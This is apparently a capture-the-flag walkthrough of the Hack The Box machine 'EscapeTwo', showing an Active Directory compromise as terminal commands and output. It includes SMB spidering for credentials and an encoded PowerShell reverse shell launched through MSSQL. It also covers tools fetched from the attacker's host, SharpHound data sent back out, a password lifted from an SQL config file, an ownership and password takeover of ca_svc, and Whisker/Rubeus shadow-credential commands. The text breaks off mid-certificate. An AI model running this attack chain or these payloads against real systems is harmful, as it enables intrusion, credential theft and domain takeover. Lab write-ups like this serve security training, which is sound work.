EscapeTwo
Recon
As is common in real life Windows pentests, you will start this box with credentials for the following account: rose / KxEPkKe6R8su
Creds:
rose:KxEPkKe6R8su
SMB (139/445)
└─$ netexec smb 10.10.11.51 -u 'rose' -p 'KxEPkKe6R8su' -M spider_plus -o DOWNLOAD_FLAG=True
SMB 10.10.11.51 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.51 445 DC01 [+] sequel.htb\rose:KxEPkKe6R8su
SPIDER_PLUS 10.10.11.51 445 DC01 [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.11.51 445 DC01 [*] DOWNLOAD_FLAG: True
SPIDER_PLUS 10.10.11.51 445 DC01 [*] STATS_FLAG: True
SPIDER_PLUS 10.10.11.51 445 DC01 [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.11.51 445 DC01 [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.11.51 445 DC01 [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.11.51 445 DC01 [*] OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB 10.10.11.51 445 DC01 [*] Enumerated shares
SMB 10.10.11.51 445 DC01 Share Permissions Remark
SMB 10.10.11.51 445 DC01 ----- ----------- ------
SMB 10.10.11.51 445 DC01 Accounting Department READ
SMB 10.10.11.51 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.51 445 DC01 C$ Default share
SMB 10.10.11.51 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.51 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.51 445 DC01 SYSVOL READ Logon server share
SMB 10.10.11.51 445 DC01 Users READ
SPIDER_PLUS 10.10.11.51 445 DC01 [-] Failed to download file "Default/NTUSER.DAT.LOG2". Error: 'RemoteFile' object has no attribute 'get_filesize'
SPIDER_PLUS 10.10.11.51 445 DC01 [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.11.51.json".
SPIDER_PLUS 10.10.11.51 445 DC01 [*] SMB Shares: 7 (Accounting Department, ADMIN$, C$, IPC$, NETLOGON, SYSVOL, Users)
SPIDER_PLUS 10.10.11.51 445 DC01 [*] SMB Readable Shares: 5 (Accounting Department, IPC$, NETLOGON, SYSVOL, Users)
SPIDER_PLUS 10.10.11.51 445 DC01 [*] SMB Filtered Shares: 1
SPIDER_PLUS 10.10.11.51 445 DC01 [*] Total folders found: 76
SPIDER_PLUS 10.10.11.51 445 DC01 [*] Total files found: 67
SPIDER_PLUS 10.10.11.51 445 DC01 [*] Files filtered: 6
SPIDER_PLUS 10.10.11.51 445 DC01 [*] File size average: 23.74 KB
SPIDER_PLUS 10.10.11.51 445 DC01 [*] File size min: 0 B
SPIDER_PLUS 10.10.11.51 445 DC01 [*] File size max: 512 KB
SPIDER_PLUS 10.10.11.51 445 DC01 [*] File unique exts: 15 (.xlsx, .cmtx, .blf, .inf, .zfsendtotarget, .desklink, .mapimail, .pol, .log2, .log1...)
SPIDER_PLUS 10.10.11.51 445 DC01 [*] Downloads successful: 60
SPIDER_PLUS 10.10.11.51 445 DC01 [*] Downloads failed: 1
└─$ mv /tmp/nxc_hosted/nxc_spider_plus/10.10.11.51/ .
└─$ find . -type f | grep -ivE '(ini|lnk)$'
./Users/Default/NTUSER.DAT.LOG2
./Users/Default/AppData/Roaming/Microsoft/Windows/SendTo/Desktop (create shortcut).DeskLink
./Users/Default/AppData/Roaming/Microsoft/Windows/SendTo/Mail Recipient.MAPIMail
./Users/Default/AppData/Roaming/Microsoft/Windows/SendTo/Compressed (zipped) Folder.ZFSendToTarget
./Accounting Department/accounts.xlsx
./Accounting Department/accounting_2024.xlsx
./SYSVOL/sequel.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
./SYSVOL/sequel.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
./SYSVOL/sequel.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/comment.cmtx
./SYSVOL/sequel.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.polFor some reason you can't open excel files?... Unzip them and read contents manually.
└─$ unzip accounting_2024.xlsx -d accounting_2024
└─$ unzip accounts.xlsx -d accountsSearching for domain we get many results and it looks like passwords too!
First Name
Last Name
Username
Password
MSSQL (1433)
We have command execution as MSSQL server.
└─$ netexec mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth -x whoami
MSSQL 10.10.11.51 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb)
MSSQL 10.10.11.51 1433 DC01 [+] DC01\sa:MSSQLP@ssw0rd! (Pwn3d!)
MSSQL 10.10.11.51 1433 DC01 [+] Executed command via mssqlexec
MSSQL 10.10.11.51 1433 DC01 sequel\sql_svc└─$ netexec mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth -x 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANAA3ACIALAA0ADQANAA1ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=='
MSSQL 10.10.11.51 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb)
MSSQL 10.10.11.51 1433 DC01 [+] DC01\sa:MSSQLP@ssw0rd! (Pwn3d!)
[14:42:23] ERROR Error when attempting to execute command via xp_cmdshell: timed out
---
└─$ listen 4445
Ncat: Connection from 10.10.11.51:50320.
PS C:\Windows\system32> whoami /all
User Name SID
============== ============================================
sequel\sql_svc S-1-5-21-548670397-972687484-3496335370-1122
Group Name Type SID Attributes
========================================== ================ =============================================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT SERVICE\MSSQL$SQLEXPRESS Well-known group S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133 Enabled by default, Enabled group, Group owner
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
SEQUEL\SQLServer2005SQLBrowserUser$DC01 Alias S-1-5-21-548670397-972687484-3496335370-1128 Mandatory group, Enabled by default, Enabled group, Local Group
SEQUEL\SQLRUserGroupSQLEXPRESS Alias S-1-5-21-548670397-972687484-3496335370-1129 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\High Mandatory Level Label S-1-16-12288
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set DisabledReverse Shell
PS C:\Users\sql_svc\Music> curl.exe --version
curl 8.9.1 (Windows) libcurl/8.9.1 Schannel zlib/1.3 WinIDN
Release-Date: 2024-07-31
Protocols: dict file ftp ftps http https imap imaps ipfs ipns mqtt pop3 pop3s smb smbs smtp smtps telnet tftp
Features: alt-svc AsynchDNS HSTS HTTPS-proxy IDN IPv6 Kerberos Largefile libz NTLM SPNEGO SSL SSPI threadsafe Unicode UnixSockets
PS C:\Users\sql_svc\Music> curl.exe 10.10.14.47/wp.exe -O
PS C:\Users\sql_svc\Music> .\wp.exe | tee -filepath wp.log
...
------------ Checking KrbRelayUp
- https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#krbrelayup
The system is inside a domain (SEQUEL) so it could be vulnerable.
- You can try https://github.com/Dec0ne/KrbRelayUp to escalate privileges
...
------------ Logged users
NT SERVICE\MSSQLFDLauncher$SQLEXPRESS
NT SERVICE\SQLTELEMETRY$SQLEXPRESS
SEQUEL\Administrator
SEQUEL\sql_svc
SEQUEL\ryan
...
------------ Home folders found
C:\Users\Administrator
C:\Users\All Users
C:\Users\Default
C:\Users\Default User
C:\Users\Public : Service [WriteData/CreateFiles]
C:\Users\ryan
C:\Users\sql_svc : sql_svc [AllAccess]
...
------------ Modifiable Services
- Check if you can modify any service https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
LOOKS LIKE YOU CAN MODIFY OR START/STOP SOME SERVICE/s:
RmSvc: GenericExecute (Start/Stop)
ConsentUxUserSvc_581e8: GenericExecute (Start/Stop)
DevicePickerUserSvc_581e8: GenericExecute (Start/Stop)
serSvc_581e8: GenericExecute (Start/Stop)
PimIndexMaintenanceSvc_581e8: GenericExecute (Start/Stop)
PrintWorkflowUserSvc_581e8: GenericExecute (Start/Stop)
UnistoreSvc_581e8: GenericExecute (Start/Stop)
UserDataSvc_581e8: GenericExecute (Start/Stop)
WpnUserService_581e8: GenericExecute (Start/Stop)
...Upload SharpHound and collect data about AD
└─$ updog
[+] Serving /home/woyag/Desktop/Rooms/EscapeTwo...
---
PS C:\Users\sql_svc\Music> .\sh.exe -c all --zipfilename sh.zip
PS C:\Users\sql_svc\Music> curl.exe -v 10.10.14.97:9090/upload -F 'file=@20250111115528_sh.zip' -F 'path=/home/woyag/Desktop/Rooms/EscapeTwo'
Shortest Path to Domain Admins shows:
ryan seems to be our next target for priv esc.
Privilege Escalation (ryan)
PS C:\SQL2019\ExpressAdv_ENU> cat sql-Configuration.INI
[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False"
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysDQbGb3"
SQLSYSADMINACCOUNTS="SEQUEL\Administrator"
SECURITYMODE="SQL"
SAPWD="MSSQLP@ssw0rd!"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True└─$ evil-winrm -i sequal.htb -u ryan -p WqSZAF6CysDQbGb3
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all
User Name SID
=========== ============================================
sequel\ryan S-1-5-21-548670397-972687484-3496335370-1114
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
SEQUEL\Management Department Group S-1-5-21-548670397-972687484-3496335370-1602 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set EnabledUser.txt
*Evil-WinRM* PS C:\Users\ryan> cat Desktop/user.txt
f5f6936ee23db461dbb4eeb02342dabbPrivilege Escalation (ca_svc)
(LDAPS)-[DC01.sequel.htb]-[SEQUEL\ryan]
PV > Set-DomainObjectOwner -TargetIdentity ca_svc -PrincipalIdentity ryan
[2025-01-11 16:13:22] [Set-DomainObjectOwner] Changing current owner S-1-5-21-548670397-972687484-3496335370-512 to S-1-5-21-548670397-972687484-3496335370-1114
[2025-01-11 16:13:22] [Set-DomainObjectOwner] Success! modified owner for CN=Certification Authority,CN=Users,DC=sequel,DC=htb
(LDAPS)-[DC01.sequel.htb]-[SEQUEL\ryan]
PV > Add-DomainObjectAcl -PrincipalIdentity ryan -TargetIdentity ca_svc -Rights fullcontrol
[2025-01-11 16:13:22] [Add-DomainObjectACL] Found target identity: CN=Certification Authority,CN=Users,DC=sequel,DC=htb
[2025-01-11 16:13:22] [Add-DomainObjectACL] Found principal identity: CN=Ryan Howard,CN=Users,DC=sequel,DC=htb
[2025-01-11 16:13:22] Adding FullControl to S-1-5-21-548670397-972687484-3496335370-1607
[2025-01-11 16:13:23] DACL modified successfully!
(LDAPS)-[DC01.sequel.htb]-[SEQUEL\ryan]
PV > Set-DomainUserPassword -Identity ca_svc -AccountPassword 'Password123$'
[2025-01-11 16:13:23] [Set-DomainUserPassword] Principal CN=Certification Authority,CN=Users,DC=sequel,DC=htb found in domain
[2025-01-11 16:13:23] [Set-DomainUserPassword] Password has been successfully changed for user ca_svc
[2025-01-11 16:13:23] Password changed for ca_svcNote: There's like cronjob which runs every 10 second or smth, if second command fails run first and then second again.
or use bloodyAD to reset password
bloodyAD --host "10.129.128.217" -d "sequal.htb" -u "ryan" -p "WqSZAF6CysDQbGb3" set owner ca_svc ryan
bloodyAD --host "10.129.128.217" -d "sequal.htb" -u "ryan" -p "WqSZAF6CysDQbGb3" add genericAll ca_svc ryan
# bloodyAD --host "10.129.128.217" -d "sequal.htb" -u "ryan" -p "WqSZAF6CysDQbGb3" set password "ca_svc" 'Password123$'Docs: https://github.com/CravateRouge/bloodyAD/wiki/User-Guide
Password reset didn't work as intended and shadow credentials also had error about Kerberos not working.
Because kerberos doesn't work from external, we can try to do the attack internally with Whisker+Rubeus Binaries: https://github.com/jakobfriedl/precompiled-binaries
└─$ curl -LOs https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/Whisker.exe
└─$ curl -LOs https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/Rubeus.exe
---
*Evil-WinRM* PS C:\Users\ryan\Music> curl.exe 10.10.14.97/Whisker.exe -O
*Evil-WinRM* PS C:\Users\ryan\Music> curl.exe 10.10.14.97/Rubeus.exe -O
*Evil-WinRM* PS C:\Users\ryan\Music> .\Whisker.exe add /target:ca_svc
[*] No path was provided. The certificate will be printed as a Base64 blob
[*] No pass was provided. The certificate will be stored with the password JSVbHTvuGtaRz03f
[*] Searching for the target account
[*] Target user found: CN=Certification Authority,CN=Users,DC=sequel,DC=htb
[*] Generating certificate
[*] Certificate generaged
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID 44ed67c4-b31e-4db2-91c8-4d37c1e70bce
[*] Updating the msDS-KeyCredentialLink attribute of the target object
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] You can now run Rubeus with the following syntax:
Rubeus.exe asktgt /user:ca_svc /certificate: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 /password:"JSVbHTvuGtaRz03f" /domain:sequel.htb /dc:DC01.sequel.htb /getcredentials /show
*Evil-WinRM* PS C:\Users\ryan\Music> .\Rubeus.exe asktgt /user:ca_svc /certificate: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